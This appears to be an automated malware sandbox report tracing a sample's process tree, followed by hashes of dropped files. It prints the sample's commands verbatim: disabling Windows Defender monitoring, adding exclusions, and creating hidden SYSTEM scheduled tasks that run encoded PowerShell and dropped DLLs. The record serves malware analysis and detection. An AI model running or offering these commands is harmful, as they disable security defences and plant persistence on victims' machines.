C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1572
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1632
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1972
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2036
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDFWPgSfs" /SC once /ST 14:50:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDFWPgSfs"4⤵PID:840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDFWPgSfs"4⤵PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcmBoHFysFBidtSprQ" /SC once /ST 23:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\EpdQepo.exe\" RP /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:700
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3754D45B-221C-4BFE-8BD5-813D98E3D5EE} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵PID:952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:760
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1148
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1612
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1396
-
C:\Windows\system32\taskeng.exetaskeng.exe {5F1FD4AF-6ECD-4727-A09C-CD93005F9CBD} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\EpdQepo.exeC:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\EpdQepo.exe RP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:828 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEUgMxECk" /SC once /ST 00:21:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEUgMxECk"3⤵PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEUgMxECk"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1804
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2008
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtJenuXVE" /SC once /ST 22:59:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtJenuXVE"3⤵PID:996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtJenuXVE"3⤵PID:788
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:1528
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:2000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:588
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dZAkCesbbUKSZxso\ZBTpDgaj\zLKKJdLFZdZAaCXq.wsf"3⤵PID:700
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dZAkCesbbUKSZxso\ZBTpDgaj\zLKKJdLFZdZAaCXq.wsf"3⤵
- Modifies data under HKEY_USERS
PID:452 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵PID:336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵PID:1320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:288
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJniXmsIH" /SC once /ST 04:44:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJniXmsIH"3⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJniXmsIH"3⤵PID:692
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1464
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1912
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1156
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yTojJpVlyxZWLIphK" /SC once /ST 01:46:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\ZkSYWem.exe\" 8a /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yTojJpVlyxZWLIphK"3⤵PID:1656
-
-
-
C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\ZkSYWem.exeC:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\ZkSYWem.exe 8a /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcmBoHFysFBidtSprQ"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:968
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:524
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1100
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xPPqLUFFU\FGlSXg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mvThVpxzbhgVRbG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mvThVpxzbhgVRbG2" /F /xml "C:\Program Files (x86)\xPPqLUFFU\ofiZBaU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mvThVpxzbhgVRbG"3⤵PID:1668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mvThVpxzbhgVRbG"3⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xJPCobCplaVVxr" /F /xml "C:\Program Files (x86)\nNTpTrwDNnPU2\vwWmtWz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xtMHrquZTnBqG2" /F /xml "C:\ProgramData\STCeEXnoOCFBHvVB\gmHTzDn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wJXbRFPdEfkDfWLvy2" /F /xml "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\QoRJesY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whexYRdIIbHjcPpcGRQ2" /F /xml "C:\Program Files (x86)\LJVhNoouCIYvC\uuDAhrc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "diAnMdtAazTJxxqKi" /SC once /ST 18:14:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dZAkCesbbUKSZxso\XvkfUmep\cJSIiru.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "diAnMdtAazTJxxqKi"3⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1960
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1992
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1528
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yTojJpVlyxZWLIphK"3⤵PID:468
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\XvkfUmep\cJSIiru.dll",#1 /site_id 5254032⤵PID:892
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\XvkfUmep\cJSIiru.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:864 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "diAnMdtAazTJxxqKi"4⤵PID:1696
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1088
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1784
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1312
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5bd96cd54fde28c2717dee0e03283f20f
SHA14cd0237fb9bb71286abdae70b367cbf007ce8e35
SHA2567eb287c99975909b7a6549573a03a3f5bfbd2b1618d24b5beddc6b77430ad9be
SHA512ffd8be25c129663ef4795262b0a4e20ddd894d2e41f3234288188e5daae310492cd1c5e3a6ad8d167f7c924825309d4fec68f05b0d9f0cd1f340fbc3e83c254d
-
Filesize
2KB
MD5675da7c324745650d005fb288ebf36ad
SHA1785c97cbe47dfb8ba4eb240a4a95da0d58d8ee78
SHA256ac5f88bd748dc3a530342f88fb5e1915e8e30a8b685cbffa3c98c7abdc52c0d8
SHA512f4ae89c89504c8a606f84f00cf99ecd3521e41adeb1b543899bb7d85115bca397c6900e193748e9901d531a88ecc6ca97480dfe4a5da409d0b03208ea1765f41
-
Filesize
2KB
MD549a28ef561667be9b0b138ab48e5fa26
